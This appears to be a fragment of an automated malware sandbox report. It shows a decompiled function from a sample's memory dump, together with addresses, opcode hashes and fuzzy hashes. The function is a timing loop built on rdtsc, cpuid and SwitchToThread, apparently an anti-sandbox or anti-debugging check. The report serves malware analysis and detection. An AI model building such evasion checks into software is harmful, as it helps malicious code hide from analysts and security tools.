                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4AC1A977A18BC586D760CF1AE44179ABBA4F3987D0F00852AEA9D83B69DB7CC450CF50
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 02001E50, Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  C-Code - Quality: 74%
                                                                                                                                                                                                                                  			E02001E50(intOrPtr __ebx, intOrPtr __edx, signed long long __rax, long long __rbx, signed long long __rdx, signed long long __rsi) {
				signed int _t18;
				signed long long _t31;
				signed long long _t34;
				signed long long _t41;
				signed long long _t42;
				signed long long _t43;
				signed long long _t44;
				void* _t45;
				signed long long _t47;
				long long _t49;
				void* _t51;
				void* _t52;

				_t47 = __rsi;
				_t41 = __rdx;
				_t31 = __rax;
				 *((long long*)(_t51 + 8)) = __rbx;
				 *((long long*)(_t51 + 0x10)) = _t49;
				 *((long long*)(_t51 + 0x18)) = __rsi;
				_push(_t45);
				_t52 = _t51 - 0x30;
				do {
					SwitchToThread();
					asm("rdtsc");
					_t42 = _t41 << 0x20;
					asm("cpuid");
					 *((intOrPtr*)(_t52 + 0x20)) = 1;
					 *((intOrPtr*)(_t52 + 0x24)) = __ebx;
					 *((intOrPtr*)(_t52 + 0x28)) = 0;
					 *((intOrPtr*)(_t52 + 0x2c)) = __edx;
					asm("rdtsc");
					_t43 = _t42 << 0x20;
					_t34 = (_t31 | _t42 | _t43) - (_t31 | _t42);
					_t45 = _t45 + _t34;
					_t18 = SwitchToThread();
					asm("rdtsc");
					_t44 = _t43 << 0x20;
					asm("rdtsc");
					_t41 = _t44 << 0x20;
					_t31 = (_t34 | _t44 | _t41) - (_t34 | _t44);
					_t47 = _t47 + _t31;
					_t49 = _t49 - 1;
				} while (_t49 != 0);
				return _t18 / _t47;
			}















                                                                                                                                                                                                                                  0x02001e50
                                                                                                                                                                                                                                  0x02001e50
                                                                                                                                                                                                                                  0x02001e50
                                                                                                                                                                                                                                  0x02001e50
                                                                                                                                                                                                                                  0x02001e55
                                                                                                                                                                                                                                  0x02001e5a
                                                                                                                                                                                                                                  0x02001e5f
                                                                                                                                                                                                                                  0x02001e60
                                                                                                                                                                                                                                  0x02001e6b
                                                                                                                                                                                                                                  0x02001e6b
                                                                                                                                                                                                                                  0x02001e71
                                                                                                                                                                                                                                  0x02001e73
                                                                                                                                                                                                                                  0x02001e84
                                                                                                                                                                                                                                  0x02001e86
                                                                                                                                                                                                                                  0x02001e8a
                                                                                                                                                                                                                                  0x02001e8e
                                                                                                                                                                                                                                  0x02001e92
                                                                                                                                                                                                                                  0x02001e96
                                                                                                                                                                                                                                  0x02001e98
                                                                                                                                                                                                                                  0x02001e9f
                                                                                                                                                                                                                                  0x02001ea2
                                                                                                                                                                                                                                  0x02001ea5
                                                                                                                                                                                                                                  0x02001eab
                                                                                                                                                                                                                                  0x02001ead
                                                                                                                                                                                                                                  0x02001eb8
                                                                                                                                                                                                                                  0x02001eba
                                                                                                                                                                                                                                  0x02001ec1
                                                                                                                                                                                                                                  0x02001ec4
                                                                                                                                                                                                                                  0x02001ec7
                                                                                                                                                                                                                                  0x02001ec7
                                                                                                                                                                                                                                  0x02001ee9

                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2097288821.0000000002000000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
                                                                                                                                                                                                                                  • Instruction ID: ee773c329dca8cb950fe41a0ed50da33fa87c29bc910b354af3ba42b0bbf4759
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44019E72B24B908AEF648B26B644349B6A2E38D7C0F148535EB9C43B19DA3CD0958B04
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%